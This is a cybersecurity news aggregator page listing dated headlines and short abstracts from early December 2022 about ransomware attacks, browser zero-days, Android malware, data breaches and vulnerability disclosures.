Ransomware Toolkit Cryptonite turning into an accidental wiper Full Text
Abstract
Researchers spotted a version of the open-source ransomware toolkit Cryptonite that doesn't support decryption capabilities. Fortinet researchers discovered a sample of malware generated with the publicly available open-source ransomware toolkit...Security Affairs
December 06, 2022 – Outage
Antwerp’s city services down after hackers attack digital partner Full Text
Abstract
The city of Antwerp, Belgium, is working to restore its digital services that were disrupted last night by a cyberattack on its digital provider.BleepingComputer
December 6, 2022 – Vulnerabilities
NETGEAR Router Vulnerability Allowed Access to Restricted Services Full Text
Abstract
A new report from Tenable outlined an emerging threat related to NETGEAR and TP-Link routers. According to Tenable research, both TP-Link and NETGEAR had to release last-minute patches for their devices that were a part of the Pwn2Own event.Cyware
December 6, 2022 – Policy and Law
Crook sentenced to 18 months for stealing $20M in SIM swapping attack Full Text
Abstract
Nicholas Truglia, from Florida, US, was sentenced to 18 months in prison for stealing more than $20 million in a SIM swapping scheme. DoJ announced that Nicholas Truglia (25) was sentenced to 18 months in prison for the theft of over $20 million worth...Security Affairs
December 06, 2022 – Criminals
Suspects arrested for hacking US networks to steal employee data Full Text
Abstract
Four men suspected of hacking into US networks to steal employee data for identity theft and the filing of fraudulent US tax returns have been arrested in London, UK, and Malmo, Sweden, at the request of the U.S. law enforcement authorities.BleepingComputer
December 6, 2022 – Vulnerabilities
Eufy “no cloud” security cameras streaming data to the cloud Full Text
Abstract
Eufy home security cameras are currently in a spot of trouble as a result of door camera footage. This is because it turns out that data that should not have been going to the cloud was doing so anyway in certain conditions.Cyware
December 06, 2022 – Cryptocurrency
Microsoft: Hackers target cryptocurrency firms over Telegram Full Text
Abstract
Microsoft says that cryptocurrency investment companies have been targeted by a threat group it tracks as DEV-0139 via Telegram groups used to communicate with the firms' VIP customers.BleepingComputer
December 06, 2022 – Vulnerabilities
Android December 2022 security updates fix 81 vulnerabilities Full Text
Abstract
Google has released the December 2022 security update for Android, fixing four critical-severity vulnerabilities, including a remote code execution flaw exploitable via Bluetooth.BleepingComputer
December 06, 2022 – Outage
Rackspace confirms outage was caused by ransomware attack Full Text
Abstract
Texas-based cloud computing provider Rackspace has confirmed today that a ransomware attack is behind an ongoing Hosted Exchange outage described as an "isolated disruption."BleepingComputer
December 06, 2022 – Denial Of Service
Massive DDoS attack takes Russia’s second-largest bank VTB offline Full Text
Abstract
Russia's second-largest financial institution VTB Bank says it is facing the worse cyberattack in its history after its website and mobile apps were taken offline due to an ongoing DDoS (distributed denial of service) attack.BleepingComputer
December 06, 2022 – General
Password Reset Calls Are Costing Your Org Big Money Full Text
Abstract
Research states that the average help desk labor cost for a single password reset is about $70. With this cost, what can an organization do to lessen the impact of password resets?BleepingComputer
December 05, 2022 – General
Microsoft warns of Russian cyberattacks throughout the winter Full Text
Abstract
Microsoft has warned of Russian-sponsored cyberattacks continuing to target Ukrainian infrastructure and NATO allies in Europe throughout the winter.BleepingComputer
December 05, 2022 – Government
CISA orders agencies to patch exploited Google Chrome bug by Dec 26th Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) has added one more security vulnerability to its list of bugs known to be exploited in attacks.BleepingComputer
December 5, 2022 – Criminals
India: Hackers Selling Personal Data Of 150,000 Patients From Tamil Nadu Hospital On Dark Web Full Text
Abstract
The seller shared a sample as proof, showing data records dated from the years 2007-2011. The data set of 150,000 records of patients' information includes their name, guardian name, date of birth, doctor's details, and address information.Cyware
December 5, 2022 – Outage
French hospital cancels operations after a ransomware attack Full Text
Abstract
A French hospital near Paris canceled operations and transfer some patients due to a cyber attack suffered over the weekend. France's health ministry announced that the Hospital Centre of Versailles was hit by a cyber attack over the weekend. Hospital...Security Affairs
December 05, 2022 – Attack
Ransomware attack forces French hospital to transfer patients Full Text
Abstract
The André-Mignot teaching hospital in the suburbs of Paris had to shut down its phone and computer systems because of a ransomware attack that hit on Saturday evening.BleepingComputer
December 5, 2022 – Vulnerabilities
Attackers Target Vulnerable Redis Servers to Deliver Redigo Backdoor Full Text
Abstract
AquaSec security firm spotted a new Go-based malware, dubbed Redigo, launching attacks on Redis servers. The adversaries are exploiting an already patched critical flaw, CVE-2022-0543, in Redis servers. The flaw—CVSS score 10.0—is a Lua sandbox escape flaw that impacts Debian and Debian-derived Lin ... Read MoreCyware
December 5, 2022 – Malware
Exclusive: The largest mobile malware marketplace identified by Resecurity in the Dark Web Full Text
Abstract
Resecurity has identified a new underground marketplace in the Dark Web oriented towards mobile malware developers and operators. "In the Box" dark web marketplace is leveraged by cybercriminals to attack over 300 financial institutions (FIs), payment...Security Affairs
December 05, 2022 – Hacker
Sneaky hackers reverse defense mitigations when detected Full Text
Abstract
A financially motivated threat actor is hacking telecommunication service providers and business process outsourcing firms, actively reversing defensive mitigations applied when the breach is detected.BleepingComputer
December 5, 2022 – Attack
‘Cybersecurity incident’ hits San Diego Unified computer network Full Text
Abstract
District Superintendent Lamont Jackson on Thursday sent a letter to his staff and families of students attending SDUSD campuses to apprise them of what he described as a "cybersecurity incident."Cyware
December 5, 2022 – Vulnerabilities
Critical Ping bug potentially allows remote hack of FreeBSD systems Full Text
Abstract
A critical stack-based buffer overflow bug, tracked as CVE-2022-23093, in the ping service can allow to take over FreeBSD systems. The maintainers of the FreeBSD operating system released updates to address a critical flaw, tracked as CVE-2022-23093,...Security Affairs
December 05, 2022 – Hacker
Hackers hijack Linux devices using PRoot isolated filesystems Full Text
Abstract
Hackers are abusing the open-source Linux PRoot utility in BYOF (Bring Your Own Filesystem) attacks to provide a consistent repository of malicious tools that work on many Linux distributions.BleepingComputer
December 5, 2022 – Malware
Platform Certificates Used to Sign Android Malware Installers and Droppers Full Text
Abstract
Several platform certificates, belonging to LG Electronics, Revoview, Mediatek, and Samsung Electronics, were found being abused by threat actors to sign malicious Android apps. Google recommends vendors minimize the number of applications signed with the platform certificate to lower the cost of p ... Read MoreCyware
December 5, 2022 – APT
Lazarus APT uses fake cryptocurrency apps to spread AppleJeus Malware Full Text
Abstract
The North Korea-linked Lazarus APT spreads fake cryptocurrency apps under the fake brand BloxHolder to install the AppleJeus malware. Volexity researchers warn of a new malware campaign conducted by the North Korea-linked Lazarus APT against cryptocurrency...Security Affairs
December 05, 2022 – Vulnerabilities
Severe AMI MegaRAC flaws impact servers from AMD, ARM, HPE, Dell, others Full Text
Abstract
Three vulnerabilities in the American Megatrends MegaRAC Baseboard Management Controller (BMC) software impact server equipment used in many cloud service and data center providers.BleepingComputer
December 5, 2022 – Vulnerabilities
Google Patches Ninth Chrome Zero-Day of 2022 Full Text
Abstract
Patches for this vulnerability have been included in Chrome 108.0.5359.94 for Mac and Linux, and in Chrome 108.0.5359.94/.95 for Windows. Users are advised to update to a patched iteration as soon as possible.Cyware
December 5, 2022 – Outage
Rackspace Shuts Down Hosted Exchange Systems Due to Security Incident Full Text
Abstract
Rackspace has not said if this is caused by ransomware or another type of cyberattack, and it's also unclear if there was any data breach involving customer information or other kinds of information.Cyware
December 5, 2022 – Phishing
Chinese Gambling Spam Targets World Cup Keywords Full Text
Abstract
The attack affects mostly Chinese websites, but we’ve found a number of western websites also affected by the malicious injections. According to PublicWWW data, the number of infected sites exceeds 50,000 at the time of writing.Cyware
December 5, 2022 – Breach
DeFi Protocol Ankr Suffers $5 Million Theft; Promises to Reimburse Affected Users Full Text
Abstract
"We will take a snapshot and reissue ankrBNB to all valid aBNBc holders before the exploit. The ankrBNB token will continue to be redeemable, while aBNBc and aBNBb will no longer be redeemable," Ankr said in a tweet after the exploit.Cyware
December 5, 2022 – Attack
India: Safdarjung Hospital reports cyberattack but not ransomware; AIIMS server down for 11th day Full Text
Abstract
According to the officials, the Safdarjung hospital runs OPD services manually therefore it had not been severe. Meanwhile, the AIIMS server remained down for the 11th day today.Cyware
December 5, 2022 – Criminals
DuckLogs Advertises its Features and MaaS Capabilities on Cybercrime Forums Full Text
Abstract
Cyble research team has unearthed a new MaaS operation dubbed DuckLogs. It reportedly offers beginners and other cyber attackers easy access to malicious modules. DuckLogs mainly includes an information stealer and a RAT component. The malware is most likely distributed using spam or phishing email ... Read MoreCyware
December 04, 2022 – Malware
Android malware apps with 2 million installs spotted on Google Play Full Text
Abstract
A new set of Android malware, phishing, and adware apps have infiltrated the Google Play store, tricking over two million people into installing them.BleepingComputer
December 4, 2022 – Privacy
Law enforcement agencies can extract data from thousands of cars’ infotainment systems Full Text
Abstract
Law enforcement agencies can extract data from the infotainment systems of thousands of different car models. Data managed by infotainment systems in modern vehicles are a valuable source of information for the investigation of law enforcement agencies. Modern...Security Affairs
December 4, 2022 – Government
US DHS Cyber Safety Board will review Lapsus$ gang’s operations Full Text
Abstract
US DHS Cyber Safety Review Board will review attacks linked to the Lapsus$ extortion gang that hit multiple high-profile companies. The Department of Homeland Security (DHS) Cyber Safety Review Board announced that it will review cyberattacks linked...Security Affairs
December 4, 2022 – Malware
New CryWiper wiper targets Russian entities masquerading as a ransomware Full Text
Abstract
Experts spotted a new data wiper, dubbed CryWiper, that was employed in destructive attacks against Russian mayor's offices and courts. Researchers from Kaspersky discovered a previously unknown data wiper, dubbed CryWiper, that was employed in destructive...Security Affairs
December 4, 2022 – General
Security Affairs newsletter Round 396 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. Google...Security Affairs
December 3, 2022 – Malware
Schoolyard Bully Trojan Steals Facebook Credentials Full Text
Abstract
Schoolyard Bully Trojan, a new Android threat campaign, victimized over 300,000 users across 71 countries. The malware steals Facebook credentials pretending to be educational apps. Experts found 37 apps associated with this campaign and these are actively being distributed via third-party app stor ... Read MoreCyware
December 03, 2022 – Policy and Law
SIM swapper gets 18-months for involvement in $22 million crypto heist Full Text
Abstract
Florida man Nicholas Truglia was sentenced to 18 months in prison on Thursday for his involvement in a fraud scheme that led to the theft of millions from cryptocurrency investor Michael Terpin.BleepingComputer
December 3, 2022 – Criminals
Cybercriminal Organizations Offer Record High Reward for Signal App Zero-Days Full Text
Abstract
The market for gray-market exploit brokers is growing and a majority of credit can be given to an ongoing bidding war wherein a new entrant has bid in millions for Signal messaging app zero-days. The reasons behind this bidding war include an overwhelming 80% market share of Android in Ukraine and ... Read MoreCyware
December 03, 2022 – Cryptocurrency
Hackers use new, fake crypto app to breach networks, steal cryptocurrency Full Text
Abstract
The North Korean 'Lazarus' hacking group is linked to a new attack spreading fake cryptocurrency apps under the made-up brand, "BloxHolder," to install the AppleJeus malware for initial access to networks and steal crypto assets.BleepingComputer
December 3, 2022 – Vulnerabilities
Three Innocuous Linux Vulnerabilities Chained to Obtain Full Root Privileges Full Text
Abstract
Qualys’ Threat Research Unit has shown how a new Linux vulnerability could be chained with two other apparently harmless flaws to gain full root privileges on an affected system.Cyware
December 3, 2022 – Vulnerabilities
Mitsubishi Electric PLCs Exposed to Attacks by Engineering Software Flaws Full Text
Abstract
Researchers at industrial cybersecurity firm Nozomi Networks have discovered three vulnerabilities in Mitsubishi Electric’s GX Works3 engineering workstation software that could be exploited to hack safety systems.Cyware
December 3, 2022 – Government
FBI warns about Cuba, no, not that one — the ransomware gang Full Text
Abstract
The Cuba gang has hit more than 100 organizations worldwide, demanding over $145 million in payments and successfully extorting at least $60 million since August, according to a joint FBI and CISA advisory.Cyware
December 3, 2022 – Vulnerabilities
Google fixed the ninth actively exploited Chrome zeroday this year Full Text
Abstract
Google released security updates to address a new Chrome zero-day flaw, tracked as CVE-2022-4262, actively exploited in the wild. Google rolled out an emergency security update for the Chrome web browser to address a new zero-day vulnerability, tracked...Security Affairs
December 3, 2022 – Vulnerabilities
A new Linux flaw can be chained with other two bugs to gain full root privileges Full Text
Abstract
Qualys researchers demonstrated how to chain a new Linux flaw with two other two issues to gain full root privileges on an impacted system. Researchers at the Qualys’ Threat Research Unit demonstrated how to chain a new Linux vulnerability, tracked...Security Affairs
December 02, 2022 – Ransomware
The Week in Ransomware - December 2nd 2022 - Disrupting Health Care Full Text
Abstract
This week's big news was the Colombia health system being severely disrupted by a ransomware attack on Keralty, one of the country's largest healthcare providers.BleepingComputer
December 2, 2022 – Malware
Wipers Are Widening: Here’s Why That Matters Full Text
Abstract
In the first half of this year, researchers saw a rising trend of wiper malware being deployed in parallel with the Russia-Ukraine war. However, those wipers haven’t stayed in one place – they’re emerging globally.Security Week
Dec 02, 2022 – Hacker
Hackers Sign Android Malware Apps with Compromised Platform Certificates Full Text
Abstract
Platform certificates used by Android smartphone vendors like Samsung, LG, and MediaTek have been found to be abused to sign malicious apps. The findings were first discovered and reported by Google reverse engineer Łukasz Siewierski on Thursday. "A platform certificate is the application signing certificate used to sign the 'android' application on the system image," a report filed through the Android Partner Vulnerability Initiative ( AVPI ) reads . "The 'android' application runs with a highly privileged user id – android.uid.system – and holds system permissions, including permissions to access user data." This effectively means that a rogue application signed with the same certificate can gain the highest level of privileges as the Android operating system, permitting it to harvest all kinds of sensitive information from a compromised device. The list of malicious Android app packages that have abused the certificates is below - com.The Hacker News
December 2, 2022 – General
The Benefits and Risks of Extending Weapons Deliveries to the Cyber Domain Full Text
Abstract
While NATO members continue to supply weapons to Ukraine, they should consider the benefits and risks associated with extending these deliveries to include cyber weapons.Lawfare
December 02, 2022 – Vulnerabilities
Google Chrome emergency update fixes 9th zero-day of the year Full Text
Abstract
Google has released Chrome 108.0.5359.94/.95 for Windows, Mac, and Linux users to address a single high-severity security flaw, the ninth Chrome zero-day exploited in the wild patched since the start of the year.BleepingComputer
December 2, 2022 – Phishing
Nigeria-based group ‘Lilac Wolverine’ using COVID-19, emotional lures in BEC scams Full Text
Abstract
A cybercrime group based in Nigeria is targeting businesses in the United States and Western Europe with a plethora of scam emails as part of a larger campaign of business email compromise (BEC) attacks.The Record
Dec 02, 2022 – Government
CISA Warns of Multiple Critical Vulnerabilities Affecting Mitsubishi Electric PLCs Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week released an Industrial Control Systems (ICS) advisory warning of multiple vulnerabilities in Mitsubishi Electric GX Works3 engineering software. "Successful exploitation of these vulnerabilities could allow unauthorized users to gain access to the MELSEC iQ-R/F/L series CPU modules and the MELSEC iQ-R series OPC UA server module or to view and execute programs," the agency said . GX Works3 is an engineering workstation software used in ICS environments, acting as a mechanism for uploading and downloading programs from/to the controller, troubleshooting software and hardware issues, and performing maintenance operations. The wide range of functions also makes them an attractive target for threat actors looking to compromise such systems to commandeer the managed PLCs . Three of the 10 shortcomings relate to cleartext storage of sensitive data, four relate to the use of a hard-coded cryptograpThe Hacker News
December 2, 2022 – General
Attack of drones: airborne cybersecurity nightmare Full Text
Abstract
Threat actors could exploit drones for payload delivery, kinetic operations, and even diversion, experts warn. Original post at https://cybernews.com/security/drones-hack-airborne-cybersecurity-nightmare/ Once a niche technology, drones are about...Security Affairs
December 02, 2022 – Government
DHS Cyber Safety Board to review Lapsus$ gang’s hacking tactics Full Text
Abstract
The Department of Homeland Security (DHS) Cyber Safety Review Board will review attacks linked to an extortion group known as Lapsus$, which breached multiple high-profile companies in recent attacks.BleepingComputer
December 2, 2022 – Outage
Vatican website down in suspected hacker attack Full Text
Abstract
The official Vatican website was taken offline on Wednesday following an apparent hacking attack, the Holy See said. "Technical investigations are ongoing due to abnormal attempts to access the site," Vatican spokesman Matteo Bruni said.Reuters
Dec 02, 2022 – General
The Value of Old Systems Full Text
Abstract
Old technology solutions – every organization has a few of them tucked away somewhere. It could be an old and unsupported storage system or a tape library holding the still-functional backups from over 10 years ago. This is a common scenario with software too. For example, consider an accounting software suite that was extremely expensive when it was purchased. If the vendor eventually went under, then there's no longer any support for the software – which means that the accounting solution only works on some older operating system that isn't supplied with updates either. How valuable is it to keep older solutions like this running ? Well, organizations don't enjoy running old legacy systems just for the pleasure of it, but they're often forced to keep them running because it's their only option, or at least the only cost-effective option available to them. If it works, it works…? From a purely functional perspective, there is usually no problem with old teThe Hacker News
December 2, 2022 – Criminals
Cuba Ransomware received over $60M in Ransom payments as of August 2022 Full Text
Abstract
Cuba ransomware gang received more than $60 million in ransom payments related to attacks against 100 entities worldwide as of August 2022. The threat actors behind the Cuba ransomware (aka COLDDRAW, Tropical Scorpius) have demanded over 145 million...Security Affairs
December 02, 2022 – Hacker
BlackProxies proxy service increasingly popular among hackers Full Text
Abstract
A new residential proxy market is becoming popular among hackers, cybercriminals, phishers, scalpers, and scammers, selling access to a million claimed proxy IP addresses worldwide.BleepingComputer
December 2, 2022 – General
Financial organizations more prone to accidental data leakage Full Text
Abstract
According to the Netwrix 2022 Cloud Security Report, compared to other industries surveyed, financial institutions are much more concerned about users who have legitimate access to their cloud infrastructure.Help Net Security
Dec 02, 2022 – Vulnerabilities
Researchers Disclose Supply-Chain Flaw Affecting IBM Cloud Databases for PostgreSQL Full Text
Abstract
IBM has fixed a high-severity security vulnerability affecting its Cloud Databases (ICD) for PostgreSQL product that could be potentially exploited to tamper with internal repositories and run unauthorized code. The privilege escalation flaw (CVSS score: 8.8), dubbed " Hell's Keychain " by cloud security firm Wiz, has been described as a "first-of-its-kind supply-chain attack vector impacting a cloud provider's infrastructure." Successful exploitation of the bug could enable a malicious actor to remotely execute code in customers' environments and even read or modify data stored in the PostgreSQL database. "The vulnerability consists of a chain of three exposed secrets (Kubernetes service account token, private container registry password, CI/CD server credentials) coupled with overly permissive network access to internal build servers," Wiz researchers Ronen Shustin and Shir Tamari said . Hell's Keychain commences with an SQL injectThe Hacker News
December 2, 2022 – Malware
Android Keyboard Apps with 2 Million downloads can remotely hack your device Full Text
Abstract
Experts found multiple flaws in three Android Keyboard apps that can be exploited by remote attackers to compromise a mobile phone. Researchers at the Synopsys Cybersecurity Research Center (CyRC) warn of three Android keyboard apps with cumulatively...Security Affairs
December 02, 2022 – Malware
New CryWiper data wiper targets Russian courts, mayor’s offices Full Text
Abstract
A previously undocumented data wiper named CryWiper is masquerading as ransomware, extorting victims to pay for a decrypter, but in reality, it just destroys data beyond recovery.BleepingComputer
December 2, 2022 – Attack
New Zealand health insurer Accuro says it’s been hacked, can’t rule out customers’ data being accessed Full Text
Abstract
Accuro, a New Zealand health insurer, says a cybersecurity incident has compromised its ability to access systems but it's not yet known whether customer data is exposed.Newshub
Dec 02, 2022 – Hacker
Hackers Exploiting Redis Vulnerability to Deploy New Redigo Malware on Servers Full Text
Abstract
A previously undocumented Go-based malware is targeting Redis servers with the goal of taking control of the infected systems and likely building a botnet network. The attacks involve taking advantage of a critical security vulnerability in the open source, in-memory, key-value store that was disclosed earlier this year to deploy Redigo , according to cloud security firm Aqua . Tracked as CVE-2022-0543 (CVSS score: 10.0), the weakness pertains to a case of sandbox escape in the Lua scripting engine that could be leveraged to attain remote code execution. This is not the first time the flaw has come under active exploitation, what with Juniper Threat Labs uncovering attacks perpetrated by the Muhstik botnet in March 2022 to execute arbitrary commands. The Redigo infection chain is similar in that the adversaries scan for exposed Redis servers on port 6379 to establish initial access, following it up by downloading a shared library "exp_lin.so" from a remote server.The Hacker News
December 02, 2022 – Criminals
Police arrest 55 members of ‘Black Panthers’ SIM Swap gang Full Text
Abstract
The Spanish National Police have arrested 55 members of the 'Black Panthers' cybercrime group, including one of the organization's leaders based in Barcelona.BleepingComputer
December 2, 2022 – Outage
Internet issues caused by ‘unauthorized third party’ close South Jersey school Full Text
Abstract
Classes are canceled for the third day in a row in a Gloucester County school district due to technical problems caused by an "unauthorized third party," according to notifications from the district.6ABC
Dec 02, 2022 – Education
What the CISA Reporting Rule Means for Your IT Security Protocol Full Text
Abstract
The new Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA) requires CISA to create rules regarding cyber incident reporting by critical infrastructure organizations. The RFI and hearings precede a Notice of Proposed Rulemaking (NPRM) that CISA must publish sooner than 24 months from the enactment of CIRCIA, which the President signed into law in March . The sessions and NPRM are steps toward creating the new rule. CISA is soliciting expert opinion on what to include in a report but is taking steps to implement the change soon. Here's what that change means for businesses in the US and what you can do about it now. Overview of the CISA reporting rule Owners and operators of critical infrastructure must file cyber incident reports with CISA within 72 hours . They must report ransom payments for ransomware attacks within 24 hours . Other businesses can take part voluntarily. The CISA Director can subpoena organizations in noncompliance to compelThe Hacker News
December 02, 2022 – Solution
How Windows 11’s Enhanced Phishing Protection guards your password Full Text
Abstract
One of the easier ways to steal a user's credentials is through a convincing fake login page or application. To help combat the constant risk of password theft, Microsoft added enhanced phishing protection in Windows 11 Version 22H2.BleepingComputer
December 2, 2022 – Malware
Archive files become preferred format for malware delivery Full Text
Abstract
The team at HP Wolf Security found that cybercriminals are using archive files as the preferred method for spreading malware, beating Microsoft Office for the first time.Tech Target
Dec 02, 2022 – Malware
Watch Out! These Android Keyboard Apps With 2 Million Installs Can be Hacked Remotely Full Text
Abstract
Multiple unpatched vulnerabilities have been discovered in three Android apps that allow a smartphone to be used as a remote keyboard and mouse. The apps in question are Lazy Mouse , PC Keyboard , and Telepad , which have been cumulatively downloaded over two million times from the Google Play Store. Telepad is no longer available through the app marketplace but can be downloaded from its website. Lazy Mouse (com.ahmedaay.lazymouse2 and com.ahmedaay.lazymousepro) PC Keyboard (com.beapps.pckeyboard) Telepad (com.pinchtools.telepad) While these apps function by connecting to a server on a desktop and transmitting to it the mouse and keyboard events, the Synopsys Cybersecurity Research Center (CyRC) found as many as seven flaws related to weak or missing authentication, missing authorization, and insecure communication. The issues (from CVE-2022-45477 through CVE-2022-45483), in a nutshell, could be exploited by a malicious actor to execute arbitrary commands sans authenticatiThe Hacker News
December 2, 2022 – Criminals
Ransomware group may have stolen customer bank details from British water company Full Text
Abstract
The affected details include the names and addresses associated with customers’ accounts as well as the bank details used to set up direct debit payments. The company said it is writing letters to the affected customers.The Record
Dec 02, 2022 – Criminals
Cuba Ransomware Extorted Over $60 Million in Ransom Fees from More than 100 Entities Full Text
Abstract
The threat actors behind Cuba (aka COLDDRAW) ransomware have received more than $60 million in ransom payments and compromised over 100 entities across the world as of August 2022. In a new advisory shared by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI), the agencies highlighted a "sharp increase in both the number of compromised U.S. entities and the ransom amounts." The ransomware crew, also known as Tropical Scorpius , has been observed targeting financial services, government facilities, healthcare, critical manufacturing, and IT sectors, while simultaneously expanding its tactics to gain initial access and interact with breached networks. It's worth noting that despite the name "Cuba," there is no evidence to suggest that the actors have any connection or affiliation with the island country. The entry point for the attacks involves the exploitation of known security flaws, phishing,The Hacker News
December 01, 2022 – Breach
Samsung, LG, Mediatek certificates compromised to sign Android malware Full Text
Abstract
Multiple platform certificates used by Android OEM device vendors to digitally sign core system applications have also been used to sign Android apps containing malware.BleepingComputer
Dec 01, 2022 – Malware
Google Accuses Spanish Spyware Vendor of Exploiting Chrome, Firefox, & Windows Zero-Days Full Text
Abstract
A Barcelona-based surveillanceware vendor named Variston IT is said to have surreptitiously planted spyware on targeted devices by exploiting several zero-day flaws in Google Chrome, Mozilla Firefox, and Windows, some of which date back to December 2018. "Their Heliconia framework exploits n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender, and provides all the tools necessary to deploy a payload to a target device," Google Threat Analysis Group (TAG) researchers Clement Lecigne and Benoit Sevens said in a write-up. Variston, which has a bare-bones website , claims to "offer tailor made Information Security Solutions to our customers," "design custom security patches for any kind of proprietary system," and support the "the discovery of digital information by [law enforcement agencies]," among other services. The vulnerabilities, which have been patched by Google, Microsoft, and Mozilla in 2021 and early 2022, are believed toThe Hacker News
Dec 01, 2022 – Breach
Hackers Leak Another Set of Medibank Customer Data on the Dark Web Full Text
Abstract
Medibank on Thursday confirmed that the threat actors behind the devastating cyber attack have posted another dump of data stolen from its systems on the dark web after its refusal to pay a ransom. "We are in the process of analyzing the data, but the data released appears to be the data we believed the criminal stole," the Australian health insurer said . "While our investigation continues there are currently no signs that financial or banking data has been taken. And the personal data stolen, in itself, is not sufficient to enable identity and financial fraud. The raw data we have analyzed today so far is incomplete and hard to understand." The leak comes almost a month after the company acknowledged that personal data belonging to around 9.7 million of its current and former customers were accessed following a ransomware incident in October 2022. This includes 5.1 million Medibank customers, 2.8 million ahm customers, and 1.8 million international custThe Hacker News
Dec 01, 2022 – Vulnerabilities
Researchers Disclose Critical RCE Vulnerability Affecting Quarkus Java Framework Full Text
Abstract
A critical security vulnerability has been disclosed in the Quarkus Java framework that could be potentially exploited to achieve remote code execution on affected systems. Tracked as CVE-2022-4116 (CVSS score: 9.8), the shortcoming could be trivially abused by a malicious actor without any privileges. "The vulnerability is found in the Dev UI Config Editor, which is vulnerable to drive-by localhost attacks that could lead to remote-code execution (RCE)," Contrast Security researcher Joseph Beeton, who reported the bug, said in a write-up. Quarkus, developed by Red Hat, is an open source project that's used for creating Java applications in containerized and serverless environments. It's worth pointing out that the issue only impacts developers who are running Quarkus and are tricked into visiting a specially crafted website, which is embedded with malicious JavaScript code designed to install or execute arbitrary payloads. This could take the form oThe Hacker News
Dec 01, 2022 – Education
What Developers Need to Fight the Battle Against Common Vulnerabilities Full Text
Abstract
Today's threat landscape is constantly evolving, and now more than ever, organizations and businesses in every sector have a critical need to consistently produce and maintain secure software. While some verticals - like the finance industry, for example - have been subject to regulatory and compliance requirements for some time, we are seeing a steady increase in attention on cybersecurity best practices at the highest levels of government, with the US, UK, and Australia all shining very recent light on the need for secure development at every stage of the SDLC. Despite this, attackers are constantly finding new ways to bypass even the most advanced protections and defenses. For example, many have shifted their focus from delivering malware to instead compromising APIs, or launching targeted attacks against a supply chain . And while those high-level incidents are happening with much greater frequency, so too are the more simplistic exploits like cross-site scripting and SQL iThe Hacker News
Dec 01, 2022 – Malware
Schoolyard Bully Trojan Apps Stole Facebook Credentials from Over 300,000 Android Users Full Text
Abstract
More than 300,000 users across 71 countries have been victimized by a new Android threat campaign called the Schoolyard Bully Trojan . Mainly designed to steal Facebook credentials, the malware is camouflaged as legitimate education-themed applications to lure unsuspecting users into downloading them. The apps, which were available for download from the official Google Play Store, have now been taken down. That said, they still continue to be available on third-party app stores. "This trojan uses JavaScript injection to steal the Facebook credentials," Zimperium researchers Nipun Gupta and Aazim Bill SE Yaswant said in a report shared with The Hacker News. It achieves this by launching Facebook's login page in a WebView, which also embeds within it malicious JavasCript code to exfiltrate the user's phone number, email address, and password to a configured command-and-control (C2) server. The Schoolyard Bully Trojan further makes use of native libraries suchThe Hacker News
Dec 01, 2022 – Cryptocurrency
Researchers ‘Accidentally’ Crash KmsdBot Cryptocurrency Mining Botnet Network Full Text
Abstract
An ongoing analysis into an up-and-coming cryptocurrency mining botnet known as KmsdBot has led to it being accidentally taken down. KmsdBot, as christened by the Akamai Security Intelligence Response Team (SIRT), came to light mid-November 2022 for its ability to brute-force systems with weak SSH credentials. The botnet strikes both Windows and Linux devices spanning a wide range of microarchitectures with the primary goal of deploying mining software and corralling the compromised hosts into a DDoS bot. Some of the major targets included gaming firms, technology companies, and luxury car manufacturers. Akamai researcher Larry W. Cashdollar, in a new update, explained how commands sent to the bot to understand its functionality in a controlled environment inadvertently neutralized the malware. "Interestingly, after one single improperly formatted command, the bot stopped sending commands," Cashdollar said . "It's not every day you come across a botnet tThe Hacker News
Dec 01, 2022 – Breach
LastPass Suffers Another Security Breach; Exposed Some Customers Information Full Text
Abstract
Popular password management service LastPass said it's investigating a second security incident that involved attackers accessing some of its customer information. "We recently detected unusual activity within a third-party cloud storage service, which is currently shared by both LastPass and its affiliate, GoTo," LastPass CEO Karim Toubba said . GoTo, formerly called LogMeIn, acquired LastPass in October 2015. In December 2021, the Boston-based firm announced plans to spin off LastPass as an independent company. The digital break-in resulted in the unauthorized third-party leveraging information obtained following a previous breach in August 2022 to access "certain elements of our customers' information." The August 2022 security event targeted its development environment, leading to the theft of some of its source code and technical information. In September, LastPass revealed the threat actor had access for four days. The scope of the breachThe Hacker News
December 01, 2022 – Malware
Android malware infected 300,000 devices to steal Facebook accounts Full Text
Abstract
An Android malware campaign masquerading as reading and education apps has been underway since 2018, attempting to steal Facebook account credentials from infected devices.BleepingComputer
December 1, 2022 – General
What’s Going on with FinServ? Cybersecurity Edition Full Text
Abstract
The financial services sector has been hit by cybercriminals again and again - ranging from ransomware attacks to DDoS attacks to phishing. There is a 3.5 times increase (257%) in web app and API attacks, year-over-year. 32% of organizations in the financial services sector observed accidental ... Read MoreCyware Alerts - Hacker News
December 1, 2022 – General
Private-Sector Cyber Defense in Armed Conflict Full Text
Abstract
The private sector is playing an integral role in Ukrainian cyber defense in the armed conflict between Russia and Ukraine.Lawfare
December 1, 2022 – Malware
New Go-based Redigo malware targets Redis servers Full Text
Abstract
Redigo is a new Go-based malware employed in attacks against Redis servers affected by the CVE-2022-0543 vulnerability. Researchers from security firm AquaSec discovered a new Go-based malware that is used in a campaign targeting Redis servers. Threat...Security Affairs
December 01, 2022 – Government
FBI: Cuba ransomware raked in $60 million from over 100 victims Full Text
Abstract
The FBI and CISA revealed in a new joint security advisory that the Cuba ransomware gang raked in over $60 million in ransoms as of August 2022 after breaching more than 100 victims worldwide.BleepingComputer
December 1, 2022 – Breach
Schoolyard Bully Trojan Steals Facebook Credentials Across 71 Countries via Fake Educational Apps Full Text
Abstract
Disguised as the good guy, these malicious apps known as the “Schoolyard Bully Trojan” are camouflaged as legitimate, educational applications with a wide range of books and topics for their victims to read.Zimperium
December 1, 2022 – General
3 of the Worst Data Breaches in the World That Could Have Been Prevented Full Text
Abstract
Data breaches can be devastating for organizations, these are 3 of the worst incidents that could have been prevented Data breaches can be devastating for organizations and even entire countries. Eliminating the risk of a data breach is nearly impossible,...Security Affairs
December 01, 2022 – Malware
New Redigo malware drops stealthy backdoor on Redis servers Full Text
Abstract
A new Go-based malware threat that researchers call Redigo has been targeting Redis servers vulnerable to CVE-2022-0543 to plant a stealthy backdoor and allow command execution.BleepingComputer
December 1, 2022 – Education
